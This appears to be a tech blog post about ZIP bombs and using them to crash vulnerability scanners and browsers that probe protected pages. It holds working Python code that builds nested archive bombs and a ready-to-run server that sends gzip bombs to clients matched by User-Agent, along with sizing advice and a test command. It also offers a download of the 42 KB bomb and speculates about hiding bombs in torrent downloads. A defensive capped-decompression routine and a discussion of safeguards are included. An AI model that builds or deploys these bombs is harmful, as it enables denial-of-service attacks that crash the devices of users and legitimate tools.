Zip Bomb Education 101

In Technology News by FL Computer Tech

Chrome Crash

Webmasters can use so-called ZIP bombs to crash the vulnerability scanner or browser an attacker points at their website. The trick only affects clients that download and decompress an HTTP response body; a port scanner, which never fetches a page, is unaffected, and nothing here stops an attacker who simply switches tools or spoofs a User-Agent.

The term "ZIP bomb" refers to a small archive that, when decompressed, expands to data far too large for the victim's computer to hold in memory or store on disk. The best-known form is a nested one: archives inside archives inside archives.

For example, the classic 42 KB ZIP bomb unpacks to about 4.5 petabytes of nothing but zeroes. Compression handles repetitive data extremely well, but a single layer of Deflate (the algorithm ZIP and gzip use) cannot exceed roughly 1032:1, so the petabyte figure comes from nesting: each layer holds many copies of the layer beneath it, and the multipliers compound.
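To make that arithmetic concrete, here is an added Python example (it is not code from this article or from Haschek). It streams zeroes through gzip to show the single-layer ratio, builds a 42.zip-style nested archive in memory to show how copies compound, reads the unpacked size the ZIP directory declares without inflating any leaf file, and inflates a stream under a hard byte cap so a bomb is refused instead of exhausting memory. The sizes, copy counts and function names are this example's own choices.

```python
import io
import zipfile
import zlib

MIB = 1024 * 1024
GZIP_WBITS = 16 + zlib.MAX_WBITS  # ask zlib for gzip framing rather than raw zlib


def gzip_zeros(n_bytes: int, chunk: int = MIB) -> bytes:
    """Return a gzip stream that inflates to n_bytes of NUL bytes.

    Zeros are fed to the compressor one chunk at a time, so the uncompressed
    payload never exists in memory; only the small compressed stream does.
    """
    comp = zlib.compressobj(level=9, wbits=GZIP_WBITS)
    out = bytearray()
    zeros = b"\0" * chunk
    left = n_bytes
    while left > 0:
        take = min(chunk, left)
        out += comp.compress(zeros[:take])
        left -= take
    out += comp.flush()
    return bytes(out)


def deflate_ratio(n_bytes: int) -> float:
    """Expansion ratio of ONE Deflate layer over zeros; it tops out near 1032:1."""
    return n_bytes / len(gzip_zeros(n_bytes))


def nested_zip_bomb(payload: bytes, copies: int, depth: int):
    """Build a 42.zip-style nested archive in memory (constructed sample data).

    Level 0 deflates `payload`; every further level is a ZIP holding `copies`
    identical copies of the level below. Unpacked size therefore grows as
    len(payload) * copies ** depth while the archive itself barely grows.
    Returns (archive_bytes, nominal_unpacked_size).
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED, compresslevel=9) as zf:
        zf.writestr("zeros.bin", payload)
    level = buf.getvalue()
    for d in range(1, depth + 1):
        buf = io.BytesIO()
        # Inner archives are already compressed, so store them as-is.
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
            for i in range(copies):
                zf.writestr(f"level{d}_{i}.zip", level)
        level = buf.getvalue()
    return level, len(payload) * copies ** depth


def declared_unpacked_size(archive: bytes) -> int:
    """Sum what the ZIP central directory claims each entry inflates to,
    recursing into nested .zip entries, without inflating any leaf payload.

    Cheap pre-check only: headers can lie, and a hostile archive could make a
    nested .zip entry itself huge, so the real extraction still needs a cap.
    """
    total = 0
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".zip"):
                total += declared_unpacked_size(zf.read(info))
            else:
                total += info.file_size
    return total


class DecompressionBombError(ValueError):
    pass


def safe_inflate(gz: bytes, max_out: int) -> bytes:
    """Inflate a gzip stream, aborting as soon as it would exceed max_out bytes.

    zlib's max_length argument does the work: each call may emit at most the
    requested number of bytes, so the bomb never materialises past the cap.
    """
    d = zlib.decompressobj(wbits=GZIP_WBITS)
    out = bytearray()
    data = gz
    while not d.eof:
        # Ask for one byte more than the remaining budget: receiving it proves
        # the stream is over the cap, without rejecting a stream that fits exactly.
        produced = d.decompress(data, max_out - len(out) + 1)
        out += produced
        if len(out) > max_out:
            raise DecompressionBombError(f"inflated output exceeds {max_out} bytes")
        data = d.unconsumed_tail
        if not produced and not data:
            raise ValueError("truncated gzip stream")
    return bytes(out)
```

The cap in `safe_inflate` is the one defence that generalises: any code that inflates untrusted input (archive scanners, HTTP clients, log ingesters) should bound the output bytes, not just the input bytes, because a ratio of a thousand to one per layer makes the input size meaningless.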

ZIP bombs were once used to crash antivirus software

ZIP bombs have been used for decades to crash antivirus software, which scans archives by decompressing them and inspecting their contents.

Antivirus engines have since learned to defend themselves, typically by capping how deep into nested archives they descend and how many bytes they are willing to inflate. Much other software has not, including web browsers and vulnerability scanners such as Nikto and SQLMap, which inflate an HTTP response with no limit on the size of the result.

Austrian tech expert Christian Haschek has put together two PHP scripts that check the User-Agent header of each request and deliver a ZIP bomb to vulnerability scanners, or to web browsers, that try to reach secure or private pages (admin panels, backends, or pages with login forms).

The scripts replace the page an attacker expects to see with the bomb, sent as a gzip-compressed HTTP response body with a Content-Encoding: gzip header, so the receiving client inflates it automatically; the client then runs out of memory and crashes or stalls. Two caveats for anyone deploying this: the User-Agent header is trivially spoofed, so this is a nuisance for automated tooling rather than access control, and because HTTP content encoding applies a single layer of Deflate, which cannot exceed roughly 1032:1, every hit costs you about a thousandth of what the client inflates in real bandwidth (a bomb that inflates to gigabytes is megabytes on the wire).
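Haschek's scripts are PHP; as an added example, and not his code, here is the same server-side decision in Python. A request for a protected page whose User-Agent contains a scanner marker gets a gzip stream of zeroes served with Content-Encoding: gzip, which any HTTP client that honours that header inflates on its own; everyone else gets the normal page. Nikto and SQLMap are named in the article; the other markers, the placeholder page, the port and the sizes are this example's assumptions and should be tuned for a real site.

```python
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer

MIB = 1024 * 1024
GZIP_WBITS = 16 + zlib.MAX_WBITS  # gzip framing, as Content-Encoding: gzip expects

# User-Agent fragments treated as hostile. "nikto" and "sqlmap" come from the
# article; the rest are assumptions for the demo, not a vetted fingerprint list.
SCANNER_MARKERS = ("nikto", "sqlmap", "nessus", "masscan", "python-requests")

# Placeholder for the real protected page (constructed for the example).
NORMAL_PAGE = b"<html><body><form method=post>login form</form></body></html>"


def make_gzip_bomb(inflated_bytes: int, chunk: int = MIB) -> bytes:
    """gzip stream of NULs that a client will inflate to `inflated_bytes`.

    One Deflate layer is all Content-Encoding allows, so the best ratio is
    about 1032:1: the stream you serve is roughly inflated_bytes / 1000 bytes.
    """
    comp = zlib.compressobj(level=9, wbits=GZIP_WBITS)
    out = bytearray()
    zeros = b"\0" * chunk
    left = inflated_bytes
    while left > 0:
        n = min(chunk, left)
        out += comp.compress(zeros[:n])
        left -= n
    out += comp.flush()
    return bytes(out)


def inflated_size(gz: bytes) -> int:
    """Count, without storing, how many bytes a gzip stream inflates to:
    the memory a client will try to allocate when it honours the header."""
    d = zlib.decompressobj(wbits=GZIP_WBITS)
    total = 0
    data = gz
    while not d.eof:
        chunk = d.decompress(data, MIB)
        if not chunk and not d.unconsumed_tail:
            break  # truncated stream; nothing more can come out
        total += len(chunk)
        data = d.unconsumed_tail
    return total


def is_scanner(user_agent: str) -> bool:
    ua = user_agent.lower()
    return any(marker in ua for marker in SCANNER_MARKERS)


def build_response(user_agent: str, bomb: bytes):
    """Return (status, headers, body) for a request to a protected page.

    A matching User-Agent gets the bomb with Content-Encoding: gzip so the
    client inflates it automatically; everyone else gets the real page.
    Content-Length is the *compressed* length, which is what goes on the wire.
    """
    if is_scanner(user_agent):
        headers = {
            "Content-Type": "text/html",
            "Content-Encoding": "gzip",
            "Content-Length": str(len(bomb)),
        }
        return 200, headers, bomb
    headers = {"Content-Type": "text/html", "Content-Length": str(len(NORMAL_PAGE))}
    return 200, headers, NORMAL_PAGE


class BombHandler(BaseHTTPRequestHandler):
    bomb = b""  # populated before the server starts

    def do_GET(self):
        status, headers, body = build_response(self.headers.get("User-Agent", ""), self.bomb)
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Demo sizing: 1 GiB inflated is about 1 MiB served. Scale to what your
    # bandwidth can afford; the client pays a thousand times what you do.
    BombHandler.bomb = make_gzip_bomb(1024 * MIB)
    HTTPServer(("127.0.0.1", 8080), BombHandler).serve_forever()
```

Run it and request http://127.0.0.1:8080/ with a browser to see the normal page, then with `curl -A sqlmap --compressed -o /dev/null` to watch the client inflate a gigabyte. Build the stream once at startup rather than per request, as above; compressing zeroes is cheap but not free.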

Most browsers and scanners will crash
Here’s a list put together by Haschek that details how some clients will behave when encountering a ZIP bomb.

Client: result

  • IE 11: memory rises, IE crashes
  • Chrome: memory rises, error shown
  • Edge: memory rises, then dips, and the page loads forever
  • Nikto: seems to scan fine, but no output is reported
  • SQLmap: high memory usage until crash
  • Safari: high memory usage, then crashes and reloads, then memory rises again, and so on
  • Chrome (Android): memory rises, error shown

 


The two sample PHP files needed to set up a ZIP bomb for vulnerability scanners are available on Haschek's blog. FL Computer Tech's copy of the classic 42 KB archive that unpacks to 4.5 petabytes can be downloaded here; the password is 42. A word of caution: this file is for testing and lab purposes only, and antivirus software may flag it for exactly the reason it is interesting. You assume the risk if it locks up your computer. Below is an infographic on what a petabyte is in terms of data storage size. It is quite impressive.

What is even more impressive is that a file 4.5 petabytes in size (see the infographic) can be stored, or "compressed", into a ZIP file only 41.8 KB in size. On that principle, placing ZIP bombs in a honeypot on corporate servers and web servers would likely yield favorable results. At the opposite end of the spectrum, if a ZIP bomb were slipped into a .zip or .rar download on a popular torrent or P2P file-sharing site, it could theoretically cause serious issues. That would only wreak havoc and frustration, and since it would not be profitable it probably wouldn't happen unless the idea were magnified greatly into some form of cyber attack, though this is only speculation.

 

So, there you have it! In comparison, I would say it’s like taking New York City and fitting it into your carry-on luggage. If you got to the hotel and decided to unpack your luggage and New York City came spilling out into your room, you see how that might pose an issue right? Think micro-miny into monstrous monstrosity!

Don’t forget to follow us @FLComputertech!

 


Author's Bio

Michael Duff is the CEO for FL Computer Tech. His latest endeavors have incorporated voice technology and Artificial Intelligence for Amazon and Google. When he is not in an office he enjoys world travel while living a Digital Nomad’s lifestyle, always on the lookout for a new Startup opportunity.
